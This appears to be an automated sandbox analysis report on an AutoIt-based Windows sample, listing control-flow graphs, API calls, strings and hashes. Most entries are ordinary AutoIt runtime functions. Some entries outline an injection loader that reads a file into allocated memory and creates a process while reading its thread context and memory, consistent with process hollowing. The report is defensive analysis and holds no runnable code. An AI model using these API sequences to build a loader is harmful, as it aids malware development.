                                                            • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                            • Opcode Fuzzy Hash: 615a27587bbb07de26543ae543ac43dcfb9f0781619c7b342562d257d4b1b3f1
                                                            • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1365 403633-403681 1367 4036e1-4036e3 1365->1367 1368 403683-403686 1365->1368 1367->1368 1369 4036e5 1367->1369 1370 4036e7 1368->1370 1371 403688-40368f 1368->1371 1372 4036ca-4036d2 DefWindowProcW 1369->1372 1373 4036ed-4036f0 1370->1373 1374 43d0cc-43d0fa call 411070 call 411093 1370->1374 1375 403695-40369a 1371->1375 1376 40374b-403753 PostQuitMessage 1371->1376 1380 4036d8-4036de 1372->1380 1381 4036f2-4036f3 1373->1381 1382 403715-40373c SetTimer RegisterWindowMessageW 1373->1382 1408 43d0ff-43d106 1374->1408 1377 4036a0-4036a2 1375->1377 1378 43d154-43d168 call 462527 1375->1378 1379 403711-403713 1376->1379 1385 403755-403764 call 4044a0 1377->1385 1386 4036a8-4036ad 1377->1386 1378->1379 1402 43d16e 1378->1402 1379->1380 1389 4036f9-40370c KillTimer call 40443a call 403114 1381->1389 1390 43d06f-43d072 1381->1390 1382->1379 1387 40373e-403749 CreatePopupMenu 1382->1387 1385->1379 1392 4036b3-4036b8 1386->1392 1393 43d139-43d140 1386->1393 1387->1379 1389->1379 1396 43d074-43d076 1390->1396 1397 43d0a8-43d0c7 MoveWindow 1390->1397 1400 43d124-43d134 call 462d36 1392->1400 1401 4036be-4036c4 1392->1401 1393->1372 1407 43d146-43d14f call 457c36 1393->1407 1404 43d097-43d0a3 SetFocus 1396->1404 1405 43d078-43d07b 1396->1405 1397->1379 1400->1379 1401->1372 1401->1408 1402->1372 1404->1379 1405->1401 1409 43d081-43d092 call 411070 1405->1409 1407->1372 1408->1372 1414 43d10c-43d11f call 40443a call 40434a 1408->1414 1409->1379 1414->1372
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                            • KillTimer.USER32(?,00000001), ref: 004036FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                            • CreatePopupMenu.USER32 ref: 0040373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%I
                                                            • API String ID: 129472671-1195164674
                                                            • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                            • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                            • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                            • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                            • LoadIconW.USER32(00000063), ref: 00403A76
                                                            • LoadIconW.USER32(000000A4), ref: 00403A88
                                                            • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                            • RegisterClassExW.USER32(?), ref: 00403B16
                                                              • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                              • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                              • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                              • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                              • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                              • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                              • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                            • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                            • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                            • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 104e1d1edb5dcdb23bf887df6599fcfa50e1ac6333731a240aa6491aea537e6a
                                                            • Instruction ID: 07e8ec32a39ab09ec316ba69b99ccd88376706c3ed6e25d21121d37113006561
                                                            • Opcode Fuzzy Hash: 104e1d1edb5dcdb23bf887df6599fcfa50e1ac6333731a240aa6491aea537e6a
                                                            • Instruction Fuzzy Hash: 5BA27F7150D3808FC735DB18C8547AABBE2EFD531AF094AD9E89897292D335AC0C8797

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                            • API String ID: 1825951767-3937808951
                                                            • Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                            • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                            • Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                            • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                              • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                              • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                              • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                              • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                              • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                              • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                            • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <WL$@=$\TL$%I$SL
                                                            • API String ID: 1986988660-2538527443
                                                            • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                            • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                            • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                            • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2031 dd8fe8-dd9096 call dd69a8 2034 dd909d-dd90c3 call dd9ef8 CreateFileW 2031->2034 2037 dd90ca-dd90da 2034->2037 2038 dd90c5 2034->2038 2046 dd90dc 2037->2046 2047 dd90e1-dd90fb VirtualAlloc 2037->2047 2039 dd9215-dd9219 2038->2039 2040 dd925b-dd925e 2039->2040 2041 dd921b-dd921f 2039->2041 2043 dd9261-dd9268 2040->2043 2044 dd922b-dd922f 2041->2044 2045 dd9221-dd9224 2041->2045 2050 dd92bd-dd92d2 2043->2050 2051 dd926a-dd9275 2043->2051 2052 dd923f-dd9243 2044->2052 2053 dd9231-dd923b 2044->2053 2045->2044 2046->2039 2048 dd90fd 2047->2048 2049 dd9102-dd9119 ReadFile 2047->2049 2048->2039 2054 dd911b 2049->2054 2055 dd9120-dd9160 VirtualAlloc 2049->2055 2058 dd92d4-dd92df VirtualFree 2050->2058 2059 dd92e2-dd92ea 2050->2059 2056 dd9279-dd9285 2051->2056 2057 dd9277 2051->2057 2060 dd9245-dd924f 2052->2060 2061 dd9253 2052->2061 2053->2052 2054->2039 2062 dd9167-dd9182 call dda148 2055->2062 2063 dd9162 2055->2063 2064 dd9299-dd92a5 2056->2064 2065 dd9287-dd9297 2056->2065 2057->2050 2058->2059 2060->2061 2061->2040 2071 dd918d-dd9197 2062->2071 2063->2039 2068 dd92a7-dd92b0 2064->2068 2069 dd92b2-dd92b8 2064->2069 2067 dd92bb 2065->2067 2067->2043 2068->2067 2069->2067 2072 dd9199-dd91c8 call dda148 2071->2072 2073 dd91ca-dd91de call dd9f58 2071->2073 2072->2071 2078 dd91e0 2073->2078 2079 dd91e2-dd91e6 2073->2079 2078->2039 2081 dd91e8-dd91ec CloseHandle 2079->2081 2082 dd91f2-dd91f6 2079->2082 2081->2082 2083 dd91f8-dd9203 VirtualFree 2082->2083 2084 dd9206-dd920f 2082->2084 2083->2084 2084->2034 2084->2039
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00DD90B9
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DD92DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                            • Instruction ID: 6be58c9b330e2f5e1081a2857e217467a8aa6428125591dca5310cfa46041b7b
                                                            • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                            • Instruction Fuzzy Hash: 08A1E674E00209EBDB14CFA4C899BEEFBB5BF48304F24855AE515BB380D7769A41CB64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2162 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                            • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                            • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                            • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2515 dd8d58-dd8ee8 call dd69a8 call dd8c48 CreateFileW 2522 dd8eef-dd8eff 2515->2522 2523 dd8eea 2515->2523 2526 dd8f06-dd8f20 VirtualAlloc 2522->2526 2527 dd8f01 2522->2527 2524 dd8fa2-dd8fa7 2523->2524 2528 dd8f24-dd8f3e ReadFile 2526->2528 2529 dd8f22 2526->2529 2527->2524 2530 dd8f40 2528->2530 2531 dd8f42-dd8f7c call dd8c88 call dd7c48 2528->2531 2529->2524 2530->2524 2536 dd8f7e-dd8f93 call dd8cd8 2531->2536 2537 dd8f98-dd8fa0 ExitProcess 2531->2537 2536->2537 2537->2524
                                                            APIs
                                                              • Part of subcall function 00DD8C48: Sleep.KERNEL32(000001F4), ref: 00DD8C59
                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00DD8EDB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: 3B5INLL9FEF5OFGNBQ979BBMZX0
                                                            • API String ID: 2694422964-1250685158
                                                            • Opcode ID: 189c3cf63f62623a7d1528ccd68a077505a0385397166f623cd91adf7227cc9f
                                                            • Instruction ID: 992d0db9cc0097d46f4f630440f11c775e62a8d96de7e91b96bf8dcec4b267c0
                                                            • Opcode Fuzzy Hash: 189c3cf63f62623a7d1528ccd68a077505a0385397166f623cd91adf7227cc9f
                                                            • Instruction Fuzzy Hash: DB717470E14288DAEF11DBF4C8447EEBB75AF59304F044199E248BB2C1DBBA4A45C776

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2539 40407c-404092 2540 404098-4040ad call 407a16 2539->2540 2541 40416f-404173 2539->2541 2544 4040b3-4040d3 call 407bcc 2540->2544 2545 43d3c8-43d3d7 LoadStringW 2540->2545 2548 43d3e2-43d3fa call 407b2e call 406fe3 2544->2548 2550 4040d9-4040dd 2544->2550 2545->2548 2557 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2548->2557 2561 43d400-43d41e call 407cab call 406fe3 call 407cab 2548->2561 2552 4040e3-4040e8 call 407b2e 2550->2552 2553 404174-40417d call 408047 2550->2553 2552->2557 2553->2557 2557->2541 2561->2557
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            • _memset.LIBCMT ref: 004040FC
                                                            • _wcscpy.LIBCMT ref: 00404150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                            • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                            • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                            • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                            APIs
                                                            • CreateProcessW.KERNEL32(?,00000000), ref: 00DD8403
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00DD8499
                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00DD84BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                            • Instruction ID: 349988766a9c8c9477bd3f19b93d9b3f8960e553bc195812c6dcba454f7f931e
                                                            • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                            • Instruction Fuzzy Hash: AA62FD30A14258DBEB24CFA4C851BDEB376EF58300F1091A9D10DEB394EB759E81DB69
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                            • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                            • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                            APIs
                                                              • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                            • _free.LIBCMT ref: 0043E263
                                                            • _free.LIBCMT ref: 0043E2AA
                                                              • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 76b22fcdb104576b8204d1ff80a4dd9579291db2c87d7f16e113a35b5536db53
                                                            • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                            • Opcode Fuzzy Hash: 76b22fcdb104576b8204d1ff80a4dd9579291db2c87d7f16e113a35b5536db53
                                                            • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                            • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                            • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
